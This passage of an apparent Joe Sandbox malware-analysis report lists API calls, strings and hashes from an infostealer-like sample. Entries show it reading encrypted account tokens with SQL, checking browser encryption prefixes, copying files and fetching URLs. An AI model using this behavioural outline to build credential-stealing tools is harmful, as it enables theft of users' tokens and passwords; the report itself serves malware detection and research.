                                                    • Part of subcall function 02F14B77: CopyFileA.KERNEL32(?,?,00000001), ref: 02F14D13
                                                    • Part of subcall function 02F14B77: DeleteFileA.KERNEL32(?), ref: 02F14D98
                                                  • memset.MSVCRT ref: 02F15192
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID:
                                                  • API String ID: 4017274736-0
                                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction ID: c3aa39550383a1f48dbff5efe3d0bd122a2212b73e108fbcdc1765d49e8bd5d9
                                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction Fuzzy Hash: 0641B579A4021867D714F7B0EC46FD97739AF24741F804494A689660C0EEB857C8CF92
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 02F18397
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F1839E
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 02F183BF
                                                  • __aulldiv.LIBCMT ref: 02F183D9
                                                  • __aulldiv.LIBCMT ref: 02F183E7
                                                  • wsprintfA.USER32 ref: 02F18413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 2774356765-2766056989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: f5b0de0ed2fa3a5ada9f05db07dbe95c9d80e4b03219ea81d527e5a1e51a1e26
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: 4F2147B1E44218ABEB00DFD4CD49FAEBBB9FB44B44F504609F705BB280D77869008BA5
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                  • API String ID: 1440504306-1079375795
                                                  • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                  • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess$DefaultLangUser
                                                  • String ID: B
                                                  • API String ID: 1494266314-2248957098
                                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                  APIs
                                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                  • memset.MSVCRT ref: 00409EE8
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                  • API String ID: 1977917189-1096346117
                                                  • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                  • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                  APIs
                                                    • Part of subcall function 02F07537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02F075A1
                                                    • Part of subcall function 02F07537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02F07618
                                                    • Part of subcall function 02F07537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02F07674
                                                    • Part of subcall function 02F07537: GetProcessHeap.KERNEL32(00000000,?), ref: 02F076B9
                                                    • Part of subcall function 02F07537: HeapFree.KERNEL32(00000000), ref: 02F076C0
                                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 02F0786D
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 02F078AF
                                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 02F078C1
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 02F078F6
                                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 02F07907
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 02F0793A
                                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 02F07954
                                                  • task.LIBCPMTD ref: 02F07962
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                  • String ID:
                                                  • API String ID: 2677904052-0
                                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction ID: 7a7275b3faa72a80663e553d2bfb2121f7a666b8b9869214e16651e75534c2e5
                                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction Fuzzy Hash: 4B312B7AE40109EFDB04FBE0DCD4DFEB77AEB49341B145118E206A72A0DA34A942DF61
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02F05231
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F05238
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 02F05251
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02F05278
                                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 02F052A8
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 02F052F1
                                                  • InternetCloseHandle.WININET(?), ref: 02F05320
                                                  • InternetCloseHandle.WININET(?), ref: 02F0532D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 1008454911-0
                                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction ID: 466f1aa4723cdc2cf97b3fff85cdecc4069b5dbf4ec64f336c576525b28d45b9
                                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction Fuzzy Hash: EA31E6B9A40218ABDB20CF94DC85BDCB7B5FB48704F5081D9E709A7280D7B46AC5CF99
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 3894370878-0
                                                  • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                  • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                  APIs
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 02F158AB
                                                  • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 02F15908
                                                  • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 02F15ABE
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F15457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 02F1548F
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F15527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02F1557F
                                                    • Part of subcall function 02F15527: lstrlen.KERNEL32(00000000), ref: 02F15596
                                                    • Part of subcall function 02F15527: StrStrA.SHLWAPI(00000000,00000000), ref: 02F155CB
                                                    • Part of subcall function 02F15527: lstrlen.KERNEL32(00000000), ref: 02F155EA
                                                    • Part of subcall function 02F15527: strtok.MSVCRT(00000000,?), ref: 02F15605
                                                    • Part of subcall function 02F15527: lstrlen.KERNEL32(00000000), ref: 02F15615
                                                  • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 02F159F2
                                                  • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 02F15BA7
                                                  • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 02F15C73
                                                  • Sleep.KERNEL32(0000EA60), ref: 02F15C82
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID:
                                                  • API String ID: 3630751533-0
                                                  • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction ID: 9e36eac661a289851b2fc5f59ea365907aaba11ef96b5499cbabde79035f008e
                                                  • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction Fuzzy Hash: 19E15271A11208ABCB18FBB0DE91DEE777AAF55380FC0816CA606660D0EF356B58CF51
                                                  APIs
                                                  • memset.MSVCRT ref: 02F0158E
                                                    • Part of subcall function 02F01507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F0151B
                                                    • Part of subcall function 02F01507: RtlAllocateHeap.NTDLL(00000000), ref: 02F01522
                                                    • Part of subcall function 02F01507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02F0153E
                                                    • Part of subcall function 02F01507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02F0155C
                                                    • Part of subcall function 02F01507: RegCloseKey.ADVAPI32(?), ref: 02F01566
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F015B6
                                                  • lstrlen.KERNEL32(?), ref: 02F015C3
                                                  • lstrcat.KERNEL32(?,004262EC), ref: 02F015DE
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 02F016CC
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                    • Part of subcall function 02F09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                    • Part of subcall function 02F09C27: LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                    • Part of subcall function 02F09C27: ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                    • Part of subcall function 02F09C27: LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                    • Part of subcall function 02F09C27: CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F01756
                                                  • memset.MSVCRT ref: 02F0177D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID:
                                                  • API String ID: 3885987321-0
                                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction ID: 36b27b53253af68a2d8699ee072ba94ea7aa9c6cecdb08a6e861c9eec8c744da
                                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction Fuzzy Hash: 62514FB19502199BCB19FB60DD91EEE737EAF54740F8041A8A70A620C0EF706B89CF95
                                                  APIs
                                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,02D45BB0,?,0042110C,?,00000000,?), ref: 0041696C
                                                  • sscanf.NTDLL ref: 00416999
                                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,02D45BB0,?,0042110C), ref: 004169B2
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02D45BB0,?,0042110C), ref: 004169C0
                                                  • ExitProcess.KERNEL32 ref: 004169DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID: B
                                                  • API String ID: 2533653975-2248957098
                                                  • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                  • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                  APIs
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • RegQueryValueExA.ADVAPI32(00000000,02D491A0,00000000,000F003F,?,00000400), ref: 004184EC
                                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                                  • RegQueryValueExA.ADVAPI32(00000000,02D49230,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                  • String ID: %s\%s
                                                  • API String ID: 3896182533-4073750446
                                                  • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                  • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction ID: 12215459f7b26dbe2e54a4e5725fbf05c2f146bb9460d8df3107a54507933245
                                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction Fuzzy Hash: 24213BB5D00219ABDF14DFA4EC49AEDBB75FF44321F108225E925A72D0EB706A05CF91
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1790B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17912
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 02F17944
                                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 02F17965
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 02F1796F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3225020163-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: b538304afac3a5ef64dced3ee22a76a11fa7baa516263bd0897d85568a7c55dc
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: 32012CB9A80204BBEB00EBE0DD49FAEB7B9EB48701F405154BA0596294D7749944CF51
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                  • RegOpenKeyExA.ADVAPI32(80000002,02D423F0,00000000,00020119,00000000), ref: 004176DD
                                                  • RegQueryValueExA.ADVAPI32(00000000,02D49320,00000000,00000000,?,000000FF), ref: 004176FE
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
